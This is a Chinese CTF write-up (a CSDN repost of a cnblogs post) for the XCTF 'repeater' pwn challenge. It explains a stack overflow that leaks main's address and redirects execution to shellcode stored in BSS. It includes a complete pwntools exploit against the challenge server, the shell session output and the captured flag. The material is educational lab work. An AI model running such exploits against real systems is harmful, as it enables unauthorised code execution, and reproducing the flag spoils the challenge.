# repeater-攻防世界

文章介绍了如何利用编程技巧在攻防世界的一个名为repeater的挑战中,通过编写特定的shellcode,控制输入溢出以改变程序流程,最终获取系统shell。过程中涉及了栈溢出、地址泄露和返回地址操纵等技术。
摘要由CSDN通过智能技术生成

repeater-攻防世界

image-20230401194705288

image-20230401194718188

text:0000000000000B04

from pwn import * 
sh = remote('61.147.171.105',65382)

context.arch = 'amd64'
shellcode = asm(shellcraft.sh())
print(shellcode)
sh.sendlineafter('name :',shellcode)

num = 3281697
payload = b'A'*0x20 + p64(num)
sh.sendlineafter('input :',payload)
sh.recvuntil('you :\n0x')
main_addr = int(sh.recv(12),16)

shellcode_addr = main_addr + 0x202040 - 0xa33
payload2 = b'A'*0x20 + p64(0x1) + b'B'*16 + p64(shellcode_addr)
sh.sendlineafter('input :',payload2)
sh.interactive()
giantbranch@ubuntu:~/Desktop/study$ python repeater3.py 
[+] Opening connection to 61.147.171.105 on port 65382: Done
[*] Switching to interactive mode
sorry... I can't.....
$ id
sh: 2: id: not found
$ ls
bin
dev
flag
lib
lib32
lib64
repeater
$ cat flag
cyberpeace{603b286e263cce0e4b1a381e544c3e42}
[*] Got EOF while reading in interactive
$ 
[*] Interrupted
[*] Closed connection to 61.147.171.105 port 65382
giantbranch@ubuntu:~/Desktop/study$ python repeater3.py 
[+] Opening connection to 61.147.171.105 on port 65382: Done
jhH\xb8/bin///sPH\x89�hri\x814$1�V^H�VH\x89�1�j;X\x0f\x05
[*] Switching to interactive mode
sorry... I can't.....
$ cat flag
cyberpeace{603b286e263cce0e4b1a381e544c3e42}
[*] Got EOF while reading in interactive
$  

ß参考:

本文作者: C0ngvv

本文链接: https://www.cnblogs.com/C0ngvv/p/16658316.html

关于博主: 评论和私信会在第一时间回复。或者直接私信我。

版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!

声援博主: 如果您觉得文章对您有帮助,可以点击文章右下角**【推荐】**一下。

攻防世界 repeater 题解

查看程序保护情况,开启了PIE,没开NXRELRO全开。

img

在ida64中打开分析程序,这道题程序比较简单。可以发现的信息如下:

  • 字符数组s大小为0x20,但可以读入0x40的长度,起始于rbp-30h处(见红框)
  • 变量v5可以控制循环、条件控制输出main函数地址,该变量位于rbp-20h字符数组s空间后(见粉框)
  • 通过字符串s溢出可控制变量v5的值及函数返回地址
  • 程序运行起始可输入数据到内存BSS段(见蓝框)

img

根据这些信息,这道题的思路就出来了:

  1. 程序起始运行,提示输入name时,输入一段shellcode(将存储到byte_202040处)
  2. 通过字符串s溢出控制变量v5的值为3281697,从而泄露出main函数地址
  3. 通过main函数地址及byte_202040main地址偏移,获得shellcode代码地址
  4. 构造溢出输入,覆盖返回地址,使程序跳转到shellcode执行,获得系统shell

这道题还是非常简单的,只是我在做的时候shellcode没选对,导致一直没利用成功(忘记改arch值)。

下面是这道题的完整代码:

from pwn import * 

sh = remote('61.147.171.105',50187)

# 通过输入name向BSS段写入shellcode
context.arch = 'amd64'
shellcode = asm(shellcraft.sh())
sh.sendlineafter('name :',shellcode)

# 通过输入内容溢出修改控制变量值,泄露main地址
num = 3281697
payload = b'A'*0x20 + p64(num)
sh.sendlineafter('input :',payload)
sh.recvuntil('you :\n0x')
main_addr = int(sh.recv(12),16)

# 再次通过输入内容溢出,将函数返回地址改为shellcode地址
shellcode_addr = main_addr + 0x202040 - 0xa33
payload2 = b'A'*0x20 + p64(0x1) + b'B'*16 + p64(shellcode_addr)
sh.sendlineafter('input :',payload2)
sh.interactive()

执行结果如图:

img

[攻防世界 repeater 题解](

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值